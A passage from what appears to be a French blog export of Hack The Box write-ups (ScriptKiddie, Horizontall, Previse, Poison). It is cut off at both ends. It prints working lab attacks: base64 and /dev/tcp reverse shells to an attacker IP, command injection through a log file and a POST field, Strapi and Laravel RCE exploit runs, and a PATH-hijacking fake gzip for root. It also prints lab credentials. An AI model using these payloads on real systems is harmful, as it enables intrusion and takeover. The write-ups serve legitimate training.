/dev/null --------------------------------- ┌──(kali㉿kali)-[~/htb/ScriptKiddie] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.10.226] 55968 sh: 0: can\u0026#39;t access tty; job control turned off $ whoami kid $ cat /home/kid/user.txt be0d.....478d kid -\u0026gt; pwn /home/pwn/scanlosers.sh On observe un script qu\u0026rsquo;on peut lire dans le home directory de l\u0026rsquo;utilisateur pwn. On découvre egalement un fichier \u0026ldquo;hackers\u0026rdquo; dans dossiers logs/ de kid (notre utilisateur).\nLe script de pwn effectue un nmap sur une ip lorsqu\u0026rsquo;une nouvelle ligne est ajouté dans le fichier de logs hackers. Dans ce cas, il récupère l\u0026rsquo;ip ecrite en 3ème position sur la ligne, puis fait le nmap. Ensuite, il vide le fichier hackers.\nOn remarque bien que lorsqu\u0026rsquo;on ajoute une ligne dans le fichier hackers, il est immédiatement effacé, ce qui prouve que l\u0026rsquo;utilisateur pwn execute en permanence le script scanlosers.sh.\nOn peut facilement injecter une commande dans le fichier \u0026ldquo;hackers\u0026rdquo; a la place de l\u0026rsquo;addresse ip. Cette commande sera ensuite executer par pwn lors de l\u0026rsquo;execution du script scanlosers.\n1 2 3 4 5 6 7 8 9 10 11 12 # Reverse shell en base64 kid@scriptkiddie:/home/pwn$ echo -n \u0026#39;a a $(echo \u0026#34;c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvNDQ0NCAwPiYx\u0026#34; | base64 -d | bash)\u0026#39; \u0026gt;\u0026gt; /home/kid/logs/hackers ------------------- ┌──(kali㉿kali)-[~/htb/ScriptKiddie] └─$ nc -lnvp 4444 listening on [any] 4444 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.10.226] 56352 sh: 0: can\u0026#39;t access tty; job control turned off $ whoami pwn Privilege Escalation msfconsole as root On remarque la possibilité d\u0026rsquo;executer msfconsole en tant que root. En regardant sur gtfobins, on trouve directement un moyen d\u0026rsquo;ouvrir un shell en tant que root depuis msfconsole\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 pwn@scriptkiddie:~$ sudo -l Matching Defaults entries for pwn on scriptkiddie: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User pwn may run the following commands on scriptkiddie: (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole pwn@scriptkiddie:~$ sudo msfconsole ###### ############ ####################### # # ### # # ## ######################## ## ## ## ## https://metasploit.com =[ metasploit v6.0.9-dev ] + -- --=[ 2069 exploits - 1122 auxiliary - 352 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: Use the edit command to open the currently active module in your editor msf6 \u0026gt; msf6 \u0026gt; irb [-] Unknown command: msf6. msf6 \u0026gt; irb [*] Starting IRB shell... [*] You are in the \u0026#34;framework\u0026#34; object irb: warn: can\u0026#39;t alias jobs from irb_jobs. \u0026gt;\u0026gt; system(\u0026#39;/bin/sh\u0026#39;) # whoami root # cat /root/root.txt 1f30.....dd22 ","date":"2025-03-07T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/scriptkiddie-htb/","title":"HTB | ScriptKiddie"},{"content":" Machine name OS IP Difficulty Horizontall Linux 10.10.11.105 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(kali㉿kali)-[~/htb/Horizontall] └─$ nmap -sC -sV -An -T4 -vvv 10.10.11.105 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL2qJTqj1aoxBGb8yWIN4UJwFs4/UgDEutp3aiL2/6yV2iE78YjGzfU74VKlTRvJZWBwDmIOosOBNl9nfmEzXerD0g5lD5SporBx06eWX/XP2sQSEKbsqkr7Qb4ncvU8CvDR6yGHxmBT8WGgaQsA2ViVjiqAdlUDmLoT2qA3GeLBQgS41e+TysTpzWlY7z/rf/u0uj/C3kbixSB/upkWoqGyorDtFoaGGvWet/q7j5Tq061MaR6cM2CrYcQxxnPy4LqFE3MouLklBXfmNovryI0qVFMki7Cc3hfXz6BmKppCzMUPs8VgtNgdcGywIU/Nq1aiGQfATneqDD2GBXLjzV | 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIyw6WbPVzY28EbBOZ4zWcikpu/CPcklbTUwvrPou4dCG4koataOo/RDg4MJuQP+sR937/ugmINBJNsYC8F7jN0= | 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJqmDVbv9RjhlUzOMmw3SrGPaiDBgdZ9QZ2cKM49jzYB 80/tcp open http syn-ack nginx 1.14.0 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://horizontall.htb |_http-server-header: nginx/1.14.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Foothold : Strapi CMS Subdomain enumeration : api-prod.horizontall.htb 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ┌──(kali㉿kali)-[~] └─$ ffuf -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H \u0026#34;Host: FUZZ.horizontall.htb\u0026#34; -mc 200 /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://horizontall.htb :: Wordlist : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt :: Header : Host: FUZZ.horizontall.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200 ________________________________________________ www [Status: 200, Size: 901, Words: 43, Lines: 2, Duration: 30ms] api-prod [Status: 200, Size: 413, Words: 76, Lines: 20, Duration: 57ms] :: Progress: [114441/114441] :: Job [1/1] :: 2020 req/sec :: Duration: [0:01:02] :: Errors: 0 :: http://api-prod.horizontall.htb/admin/strapiVersion \u0026ndash;\u0026gt; 3.0.0-beta.17.4\nCVE : Strapi 3.0.0-beta.17.4 1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/htb/Horizontall] └─$ searchsploit strapi 3.0.0-beta.17.4 ------------------------------------------- Exploit Title | Path ------------------------------------------- Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb ------------------------------------------- Shellcodes: No Results Strapi RCE 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 ┌──(kali㉿kali)-[~/htb/Horizontall] └─$ python3 50239.py http://api-prod.horizontall.htb [+] Checking Strapi CMS Version running [+] Seems like the exploit will work!!! [+] Executing exploit [+] Password reset was successfully [+] Your email is: admin@horizontall.htb [+] Your new credentials are: admin:SuperStrongPassword1 [+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQxMjcyNTQ0LCJleHAiOjE3NDM4NjQ1NDR9.VKjJDQK6JqpNUo7Zsg5plpM2HHmdxLyTboI9kDnixHk $\u0026gt; bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.19/1337 0\u0026gt;\u0026amp;1 [+] Triggering Remote code executin [*] Rember this is a blind RCE don\u0026#39;t expect to see output {\u0026#34;statusCode\u0026#34;:400,\u0026#34;error\u0026#34;:\u0026#34;Bad Request\u0026#34;,\u0026#34;message\u0026#34;:[{\u0026#34;messages\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;An error occurred\u0026#34;}]}]} $\u0026gt; bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.19%2F1337%200%3E%261 [+] Triggering Remote code executin [*] Rember this is a blind RCE don\u0026#39;t expect to see output {\u0026#34;statusCode\u0026#34;:400,\u0026#34;error\u0026#34;:\u0026#34;Bad Request\u0026#34;,\u0026#34;message\u0026#34;:[{\u0026#34;messages\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;An error occurred\u0026#34;}]}]} $\u0026gt; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.19 1337 \u0026gt;/tmp/f [+] Triggering Remote code executin [*] Rember this is a blind RCE don\u0026#39;t expect to see output ---------------------------------------------------- ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.11.105] 43406 bash: cannot set terminal process group (1988): Inappropriate ioctl for device bash: no job control in this shell strapi@horizontall:~/myapi$ whoami whoami strapi database.json - user/password for mysql 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 strapi@horizontall:~/myapi$ grep -rni pass config/ config/environments/production/database.json:13: \u0026#34;password\u0026#34;: \u0026#34;${process.env.DATABASE_PASSWORD || \u0026#39;\u0026#39;}\u0026#34;, config/environments/development/database.json:12: \u0026#34;password\u0026#34;: \u0026#34;#J!:F9Zt2u\u0026#34; config/environments/staging/database.json:13: \u0026#34;password\u0026#34;: \u0026#34;${process.env.DATABASE_PASSWORD || \u0026#39;\u0026#39;}\u0026#34;, strapi@horizontall:~/myapi$ config/ bash: config/: Is a directory strapi@horizontall:~/myapi$ cd config/ strapi@horizontall:~/myapi/config$ cd environments/development/ strapi@horizontall:~/myapi/config/environments/development$ cat database.json { \u0026#34;defaultConnection\u0026#34;: \u0026#34;default\u0026#34;, \u0026#34;connections\u0026#34;: { \u0026#34;default\u0026#34;: { \u0026#34;connector\u0026#34;: \u0026#34;strapi-hook-bookshelf\u0026#34;, \u0026#34;settings\u0026#34;: { \u0026#34;client\u0026#34;: \u0026#34;mysql\u0026#34;, \u0026#34;database\u0026#34;: \u0026#34;strapi\u0026#34;, \u0026#34;host\u0026#34;: \u0026#34;127.0.0.1\u0026#34;, \u0026#34;port\u0026#34;: 3306, \u0026#34;username\u0026#34;: \u0026#34;developer\u0026#34;, \u0026#34;password\u0026#34;: \u0026#34;#J!:F9Zt2u\u0026#34; }, \u0026#34;options\u0026#34;: {} } } } mysql - nothing interesting 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 ptrapi@horizontall:~/myapi/config/environments/development$ mysql -u developer - Enter password: Welcome to the MySQL monitor. Commands end with ; or \\g. Your MySQL connection id is 29 Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu) Copyright (c) 2000, 2021, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type \u0026#39;help;\u0026#39; or \u0026#39;\\h\u0026#39; for help. Type \u0026#39;\\c\u0026#39; to clear the current input statement. mysql\u0026gt; use strapi; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql\u0026gt; show tables; +------------------------------+ | Tables_in_strapi | +------------------------------+ | core_store | | reviews | | strapi_administrator | | upload_file | | upload_file_morph | | users-permissions_permission | | users-permissions_role | | users-permissions_user | +------------------------------+ 8 rows in set (0.00 sec) mysql\u0026gt; select * from strapi_administrator; +----+----------+-----------------------+--------------------------------------------------------------+--------------------+---------+ | id | username | email | password | resetPasswordToken | blocked | +----+----------+-----------------------+--------------------------------------------------------------+--------------------+---------+ | 3 | admin | admin@horizontall.htb | $2a$10$bPZbunuhF9lWrddSuw3RI.QmCitfZDJmwbB0WozXlxT2siCwanVVK | NULL | NULL | +----+----------+-----------------------+--------------------------------------------------------------+--------------------+---------+ 1 row in set (0.00 sec) ^^^ ||| ||| ||| THIS IS OUR PASSWORD THAT WE HAVE DEFINED... Privilege Escalation Laravel port 8000 On découvre qu\u0026rsquo;un service tourne sur le port 8000, il s\u0026rsquo;agit du framework laravel. Dans un premier temps, il a fallu faire du port forwarding afin d\u0026rsquo;avoir plus d\u0026rsquo;informations.\nChisel On fait du port forwarding avec chisel pour dupliquer sur ma kali le port 8000 de la machine cible. On découvre ensuite qu\u0026rsquo;il s\u0026rsquo;agit du framework laravel qui se cache derriere.\n1 2 3 4 5 6 7 8 9 10 11 ┌──(kali㉿kali)-[~/htb/Horizontall] └─$ ./chisel server -p 1082 --reverse 2025/03/06 10:36:18 server: Reverse tunnelling enabled 2025/03/06 10:36:18 server: Fingerprint GadUpp2bJ5QyhTVJpJx1RJ3JnbEW0HpdrGb1bHRNevo= 2025/03/06 10:36:18 server: Listening on http://0.0.0.0:1082 2025/03/06 10:36:20 server: session#1: tun: proxy#R:8000=\u0026gt;localhost:8000: Listening ----------------------- ## Sur la machine cible $ ./chisel client 10.10.14.19:1082 R:8000:localhost:8000 \u0026gt; /dev/null 2\u0026gt; /dev/null \u0026amp; Laravel : CVE-2021-3129 https://nvd.nist.gov/vuln/detail/cve-2021-3129 On doit générer un fichier phar qui permettra d\u0026rsquo;executer une commande en particulier. Ensuite, on peut exploiter laravel en passant au fichier python le fichier phar.\n1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits/phpggc] └─$ python3 ./laravel-ignition-rce.py Usage: ./laravel-ignition-rce.py \u0026lt;url\u0026gt; \u0026lt;/path/to/exploit.phar\u0026gt; [log_file_path] Generate your PHAR using PHPGGC, and add the --fast-destruct flag if you want to see your command\u0026#39;s result. The Monolog/RCE1 GC works fine. Example: $ php -d\u0026#39;phar.readonly=0\u0026#39; ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar Exploit - gaining root shell 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits/] └─$ git clone https://github.com/ambionics/phpggc.git; cd phpggc ... ## On génère le fichier phar qui executera la commande \u0026#34;id\u0026#34; ┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits/phpggc] └─$ php -d\u0026#39;phar.readonly=0\u0026#39; ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system \u0026#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.19 6666 \u0026gt;/tmp/f\u0026#34; ┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits/phpggc] └─$ cd .. ┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits] └─$ python3 ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar + Log file: /home/developer/myproject/storage/logs/laravel.log + Logs cleared + Successfully converted to PHAR ! -------------------------------- ┌──(kali㉿kali)-[~] └─$ nc -lnvp 6666 listening on [any] 6666 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.11.105] 54562 bash: cannot set terminal process group (25151): Inappropriate ioctl for device bash: no job control in this shell root@horizontall:/home/developer/myproject/public# whoami whoami root root@horizontall:/home/developer/myproject/public# cat /root/root.txt cat /root/root.txt a901e.....5a11 ","date":"2025-03-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/horizontall-htb/","title":"HTB | Horizontall"},{"content":" Machine name OS IP Difficulty Previse Linux 10.10.11.104 Easy Users 1 m4lwhere:ilovecody112235! Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -T4 -vvv 10.10.11.104 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbdbnxQupSPdfuEywpVV7Wp3dHqctX3U+bBa/UyMNxMjkPO+rL5E6ZTAcnoaOJ7SK8Mx1xWik7t78Q0e16QHaz3vk2AgtklyB+KtlH4RWMBEaZVEAfqXRG43FrvYgZe7WitZINAo6kegUbBZVxbCIcUM779/q+i+gXtBJiEdOOfZCaUtB0m6MlwE2H2SeID06g3DC54/VSvwHigQgQ1b7CNgQOslbQ78FbhI+k9kT2gYslacuTwQhacntIh2XFo0YtfY+dySOmi3CXFrNlbUc2puFqtlvBm3TxjzRTxAImBdspggrqXHoOPYf2DBQUMslV9prdyI6kfz9jUFu2P1Dd | 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCnDbkb4wzeF+aiHLOs5KNLPZhGOzgPwRSQ3VHK7vi4rH60g/RsecRusTkpq48Pln1iTYQt/turjw3lb0SfEK/4= | 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIICTOv+Redwjirw6cPpkc/d3Fzz4iRB3lCRfZpZ7irps 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004 |_http-server-header: Apache/2.4.29 (Ubuntu) | http-title: Previse Login |_Requested resource was login.php Foothold Website with bad redirection Le site web nous empeche de voir certaines pages et nous demande de nous authentifier sur la page de login.php. Cependant, on observe qu\u0026rsquo;en vérité on recoit quand meme le code source de la page, avant d\u0026rsquo;etre redirigé ! On peut donc capturer la plupart des pages, detecter avec gobuster, et les ouvrir dans burp. Ensuite, on a acces a une page sur lequel on peut créer un compte. On forge donc une requete POST depuis burp pour créer un nouveau compte. Enfin, on peut se connecter de manière classique sur le site web avec notre nouveau compte\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /accounts.php HTTP/1.1 Host: 10.10.11.104 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: http://10.10.11.104 Connection: keep-alive Referer: http://10.10.11.104/login.php Cookie: PHPSESSID=u7bqrqlp12dv65ple4ev2q1glr Upgrade-Insecure-Requests: 1 Priority: u=0, i username=leopold\u0026amp;password=password\u0026amp;confirm=password files.php - siteBackup.zip On trouve un zip avec tout le code du site web. On a notammment les creds mysql.\n1 2 3 4 5 6 7 8 9 10 11 12 \u0026lt;?php function connectDB(){ $host = \u0026#39;localhost\u0026#39;; $user = \u0026#39;root\u0026#39;; $passwd = \u0026#39;mySQL_p@ssw0rd!:)\u0026#39;; $db = \u0026#39;previse\u0026#39;; $mycon = new mysqli($host, $user, $passwd, $db); return $mycon; } ?\u0026gt; logs.php code injection Dans le fichier logs.php on découvre l\u0026rsquo;utilsation d\u0026rsquo;une variable $_POST[\u0026lsquo;delim\u0026rsquo;] dans la fonction. On peut executer un shell facilement. On met en base64 le shell pour facilité l\u0026rsquo;execution de la commande:\nPOST /logs.php \u0026hellip; delim=space;ech\u0026rsquo;/\u0026lsquo;o+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvMTMzNyAwPiYx+|+base64+-d+|+bash\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 \u0026lt;?php if (!$_SERVER[\u0026#39;REQUEST_METHOD\u0026#39;] == \u0026#39;POST\u0026#39;) { header(\u0026#39;Location: login.php\u0026#39;); exit; } ///////////////////////////////////////////////////////////////////////////////////// //I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER// ///////////////////////////////////////////////////////////////////////////////////// $output = exec(\u0026#34;/usr/bin/python /opt/scripts/log_process.py {$_POST[\u0026#39;delim\u0026#39;]}\u0026#34;); echo $output; $filepath = \u0026#34;/var/www/out.log\u0026#34;; $filename = \u0026#34;out.log\u0026#34;; if(file_exists($filepath)) { header(\u0026#39;Content-Description: File Transfer\u0026#39;); header(\u0026#39;Content-Type: application/octet-stream\u0026#39;); ----------------------------- ┌──(kali㉿kali)-[~/htb/Previse/siteBackup] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.11.104] 60650 sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ python3 -c \u0026#34;import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;)\u0026#34; www-data@previse:/var/www/html$ www-data@previse:/var/www/html$ www-data@previse:/var/www/html$ export TERM=xterm export TERM=xterm www-data@previse:/var/www/html$ ^Z zsh: suspended nc -lnvp 1337 m4lwhere - mysql db On se connecte avec mysql et les creds recupérés dans config.php\n1 2 3 4 5 6 7 mysql\u0026gt; select * from accounts; +----+----------+------------------------------------+---------------------+ | id | username | password | created_at | +----+----------+------------------------------------+---------------------+ | 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 | | 2 | leopold | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2025-03-05 17:01:15 | +----+----------+------------------------------------+---------------------+ On casse le hash avec hashcat (md5crypt \u0026ndash;\u0026gt; -m 500) :\n1 2 $ hashcat -m 500 ./hash.txt ~/wordlists/rockyou.txt --show $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235! Connection en ssh :\n1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~/htb/Previse/siteBackup] └─$ ssh m4lwhere@10.10.11.104 m4lwhere@10.10.11.104\u0026#39;s password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64) ... Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5 m4lwhere@previse:~$ ls user.txt m4lwhere@previse:~$ cat user.txt ccde.....f7fd Privilege Escalation access_backup.sh as root sudo -l \u0026ndash;\u0026gt; on observe le fichier /opt/scripts/access_backup.sh que l\u0026rsquo;on peut executer en tant que root On voit qu\u0026rsquo;il fait appel à la commande \u0026ldquo;gzip\u0026rdquo;.\n1 2 3 4 5 6 7 8 9 10 11 12 13 m4lwhere@previse:~/bin$ sudo -l User m4lwhere may run the following commands on previse: (root) /opt/scripts/access_backup.sh m4lwhere@previse:~/bin$ cat /opt/scripts/access_backup.sh #!/bin/bash # We always make sure to store logs, we take security SERIOUSLY here # I know I shouldnt run this as root but I cant figure it out programmatically on my account # This is configured to run with cron, added to sudo so I can run as needed - we\u0026#39;ll fix it later when there\u0026#39;s time gzip -c /var/log/apache2/access.log \u0026gt; /var/backups/$(date --date=\u0026#34;yesterday\u0026#34; +%Y%b%d)_access.gz gzip -c /var/www/file_access.log \u0026gt; /var/backups/$(date --date=\u0026#34;yesterday\u0026#34; +%Y%b%d)_file_access.gz On peut facilement executer n\u0026rsquo;importe quelle commande en tant que root en modifiant le PATH. On crée un dossier bin dans le /home. On y met un fichier avec le nom \u0026ldquo;gzip\u0026rdquo; et la commande pour ouvrir un reverse shell dedans. Enfin, on ajoute le dossier \u0026ldquo;bin\u0026rdquo; actuel en 1ere place dans le PATH. Lorsque l\u0026rsquo;on va executer en tant que root le script access_backup.sh, il va chercher où se trouve le binaire gzip pour l\u0026rsquo;executer. Le 1er dossier qu\u0026rsquo;il va fouiller est le notre que l\u0026rsquo;on vient d\u0026rsquo;ajouter contenant le faux gzip. Il va donc l\u0026rsquo;executer, au lieu du véritable gzip et ouvrir notre reverse shell en tant que root.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 m4lwhere@previse:~/bin$ pwd /home/m4lwhere/bin m4lwhere@previse:~/bin$ export PATH=/home/m4lwhere/bin:$PATH m4lwhere@previse:~/bin$ vim gzip m4lwhere@previse:~/bin$ chmod +x gzip m4lwhere@previse:~/bin$ cat gzip #!/bin/bash sh -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.19/6666 0\u0026gt;\u0026amp;1 m4lwhere@previse:~/bin$ sudo /opt/scripts/access_backup.sh ----------------------------------------- ┌──(kali㉿kali)-[~/htb/Previse/siteBackup] └─$ nc -lnvp 6666 listening on [any] 6666 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.11.104] 50272 # whoami root # cat /root/root.txt 3ed1.....e90e ","date":"2025-03-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/previse-htb/","title":"HTB | Previse"},{"content":" Machine name OS IP Difficulty Poison Linux 10.10.10.84 Medium Users charix : Charix!2#4%6\u0026amp;8(0\nEnumeration nmap 1 2 22 - ssh 80 - http freebsd apache Foothold charix - user flag Sur la page d\u0026rsquo;accueil on trouve un barre de recherche avec un vuln qui nous permet d\u0026rsquo;afficher n\u0026rsquo;importe quel fichier. On affiche /etc/passwd et on trouve le user charix. Ensuite, on trouve ce fichier sur la page web du port 80 de la machine. Il indique que c\u0026rsquo;est du base64 encodé 13 fois :\n1 This password is secure, it\u0026#39;s encoded atleast 13 times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo= On trouve ce script bash sur un forum qui permet de rapidement effectué 13 fois un base64 -d :\n1 2 3 4 5 state=$(\u0026lt;b64.txt) for i in {1..13}; do state=$(\u0026lt;\u0026lt;\u0026lt;\u0026#34;$state\u0026#34; base64 --decode) done echo \u0026#34;$state\u0026#34; On trouve rapidement le mot de passe, puis on se connecte en SSH :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 ┌──(kali㉿kali)-[~/htb] └─$ cd Poison ┌──(kali㉿kali)-[~/htb/Poison] └─$ vim b64.txt ┌──(kali㉿kali)-[~/htb/Poison] └─$ state=$(\u0026lt;b64.txt) for i in {1..13}; do 